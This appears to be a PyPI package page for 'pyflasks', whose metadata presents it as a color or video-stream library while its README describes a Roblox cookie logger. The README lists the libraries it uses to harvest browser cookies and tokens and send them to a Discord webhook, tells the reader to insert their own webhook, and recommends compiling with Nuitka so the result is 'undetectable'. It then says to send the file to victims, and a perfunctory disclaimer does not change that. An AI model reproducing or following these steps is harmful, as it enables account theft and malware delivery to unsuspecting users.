pyflasks


Namepyflasks JSON
Version 0.0.1 PyPI version JSON
download
home_page
Summarya py color alternative
upload_time2023-01-14 02:06:36
maintainer
docs_urlNone
authorNeuralNine (deez nuts)
requires_python
license
keywords python video stream video stream camera stream sockets
VCS
bugtrack_url
requirements No requirements were recorded.
Travis-CI No Travis.
coveralls test coverage No coveralls.
            
<!--
*** https://github.githubassets.com/images/mona-whisper.gif
-->

# DISCLAIMER
This is not to be used for any malicuis intent, I made this purely for a program that detects if you are using an unlicensed version.



<!-- PROJECT -->
<br />
<p align="center">
  </a>
  <h3 align="center">Cookie Logger</h3>

  <p align="center">
    Smooth and quick cookie logger for account recovery.
    <br />
  </p>
</p>



<!-- TABLE OF CONTENTS -->
<details open="open">
  <summary><h2 style="display: inline-block">Table of Contents</h2></summary>
  <ol>
    <li>
      <a href="#about-the-project">About The Project</a>
      <ul>
        <li><a href="#built-with">Built With</a></li>
      </ul>
    </li>
    <li>
      <a href="#getting-started">Getting Started</a>
      <ul>
        <li><a href="#prerequisites">Prerequisites</a></li>
        <li><a href="#installation">Installation</a></li>
      </ul>
    </li>
    <li><a href="#usage">Usage</a></li>
  </ol>
</details>



<!-- ABOUT THE PROJECT -->
## About The Project
Welcome to the newest release of ct1n1's Cookie Logger, a speedy cookie logger. This is my main project and I am working more and more on it. This will probably become an anti skid which steals the cookie and token of a person that downloaded a leaked copy or leaked it.


### Built With

* [Python](https://python.org)



<!-- GETTING STARTED -->
## Getting Started

To get a local copy up and running follow these simple steps.

### Prerequisites

This is an example of how to list things you need to use the software and how to install them.
  ```
  - Go to the folder with all of the files.
  - In the navigation bar (C:/User/Desktop/Roblox-Cookie-Logger) delete everything and type cmd, this will bring up "the shell".
  - Now install the packages as instructed.
  ```

### Installation

1. Install the manifest.py file
2. Create a new folder, and place it inside.
3. Open cmd and type:
   ```
   cd (path of your folder)
   ```
4. Install PIP packages
   ```
   pip install nuitka
   pip install requests
   pip install browser_cookie3
   pip install discord-webhook
   ```



<!-- USAGE EXAMPLES -->
## Usage
- Replace your webhook. The web hook replacement is at the bottom labeled (WEBHOOK HERE).

- Compile to exe using [nuitka](https://nuitka.net) PLEASE AND NOT PYINSTALLER. Why?
```
1. Harder to crack because Pyinstaller just unloads the source into the temp directory
2. Undetectable
3. Faster
4. Smaller file size that works well when compressed.
```

- Nuitka How To
```
1. Access the "Shell"
2. python -m nuitka manifest.py
```

- Send it over.

            

Raw data

            {
    "_id": null,
    "home_page": "",
    "name": "pyflasks",
    "maintainer": "",
    "docs_url": null,
    "requires_python": "",
    "maintainer_email": "",
    "keywords": "python,video,stream,video stream,camera stream,sockets",
    "author": "NeuralNine (deez nuts)",
    "author_email": "yoman261@gmail.com",
    "download_url": "https://files.pythonhosted.org/packages/65/8e/e79e96572846ef40060cfc8c2f13fafef8e1967f40fe77abe9398c3b7d47/pyflasks-0.0.1.tar.gz",
    "platform": null,
    "description": "\r\n<!--\r\n*** https://github.githubassets.com/images/mona-whisper.gif\r\n-->\r\n\r\n# DISCLAIMER\r\nThis is not to be used for any malicuis intent, I made this purely for a program that detects if you are using an unlicensed version.\r\n\r\n\r\n\r\n<!-- PROJECT -->\r\n<br />\r\n<p align=\"center\">\r\n  </a>\r\n  <h3 align=\"center\">Cookie Logger</h3>\r\n\r\n  <p align=\"center\">\r\n    Smooth and quick cookie logger for account recovery.\r\n    <br />\r\n  </p>\r\n</p>\r\n\r\n\r\n\r\n<!-- TABLE OF CONTENTS -->\r\n<details open=\"open\">\r\n  <summary><h2 style=\"display: inline-block\">Table of Contents</h2></summary>\r\n  <ol>\r\n    <li>\r\n      <a href=\"#about-the-project\">About The Project</a>\r\n      <ul>\r\n        <li><a href=\"#built-with\">Built With</a></li>\r\n      </ul>\r\n    </li>\r\n    <li>\r\n      <a href=\"#getting-started\">Getting Started</a>\r\n      <ul>\r\n        <li><a href=\"#prerequisites\">Prerequisites</a></li>\r\n        <li><a href=\"#installation\">Installation</a></li>\r\n      </ul>\r\n    </li>\r\n    <li><a href=\"#usage\">Usage</a></li>\r\n  </ol>\r\n</details>\r\n\r\n\r\n\r\n<!-- ABOUT THE PROJECT -->\r\n## About The Project\r\nWelcome to the newest release of ct1n1's Cookie Logger, a speedy cookie logger. This is my main project and I am working more and more on it. This will probably become an anti skid which steals the cookie and token of a person that downloaded a leaked copy or leaked it.\r\n\r\n\r\n### Built With\r\n\r\n* [Python](https://python.org)\r\n\r\n\r\n\r\n<!-- GETTING STARTED -->\r\n## Getting Started\r\n\r\nTo get a local copy up and running follow these simple steps.\r\n\r\n### Prerequisites\r\n\r\nThis is an example of how to list things you need to use the software and how to install them.\r\n  ```\r\n  - Go to the folder with all of the files.\r\n  - In the navigation bar (C:/User/Desktop/Roblox-Cookie-Logger) delete everything and type cmd, this will bring up \"the shell\".\r\n  - Now install the packages as instructed.\r\n  ```\r\n\r\n### Installation\r\n\r\n1. Install the manifest.py file\r\n2. Create a new folder, and place it inside.\r\n3. Open cmd and type:\r\n   ```\r\n   cd (path of your folder)\r\n   ```\r\n4. Install PIP packages\r\n   ```\r\n   pip install nuitka\r\n   pip install requests\r\n   pip install browser_cookie3\r\n   pip install discord-webhook\r\n   ```\r\n\r\n\r\n\r\n<!-- USAGE EXAMPLES -->\r\n## Usage\r\n- Replace your webhook. The web hook replacement is at the bottom labeled (WEBHOOK HERE).\r\n\r\n- Compile to exe using [nuitka](https://nuitka.net) PLEASE AND NOT PYINSTALLER. Why?\r\n```\r\n1. Harder to crack because Pyinstaller just unloads the source into the temp directory\r\n2. Undetectable\r\n3. Faster\r\n4. Smaller file size that works well when compressed.\r\n```\r\n\r\n- Nuitka How To\r\n```\r\n1. Access the \"Shell\"\r\n2. python -m nuitka manifest.py\r\n```\r\n\r\n- Send it over.\r\n",
    "bugtrack_url": null,
    "license": "",
    "summary": "a py color alternative",
    "version": "0.0.1",
    "split_keywords": [
        "python",
        "video",
        "stream",
        "video stream",
        "camera stream",
        "sockets"
    ],
    "urls": [
        {
            "comment_text": "",
            "digests": {
                "blake2b_256": "658ee79e96572846ef40060cfc8c2f13fafef8e1967f40fe77abe9398c3b7d47",
                "md5": "5ca6b3ad15240fe94986339691b671e4",
                "sha256": "9ed2713a886412436a1e6ac787215cfde0951d517f9ce5d2083d57889b91753e"
            },
            "downloads": -1,
            "filename": "pyflasks-0.0.1.tar.gz",
            "has_sig": false,
            "md5_digest": "5ca6b3ad15240fe94986339691b671e4",
            "packagetype": "sdist",
            "python_version": "source",
            "requires_python": null,
            "size": 3026,
            "upload_time": "2023-01-14T02:06:36",
            "upload_time_iso_8601": "2023-01-14T02:06:36.021171Z",
            "url": "https://files.pythonhosted.org/packages/65/8e/e79e96572846ef40060cfc8c2f13fafef8e1967f40fe77abe9398c3b7d47/pyflasks-0.0.1.tar.gz",
            "yanked": false,
            "yanked_reason": null
        }
    ],
    "upload_time": "2023-01-14 02:06:36",
    "github": false,
    "gitlab": false,
    "bitbucket": false,
    "lcname": "pyflasks"
}
        
Elapsed time: 0.06009s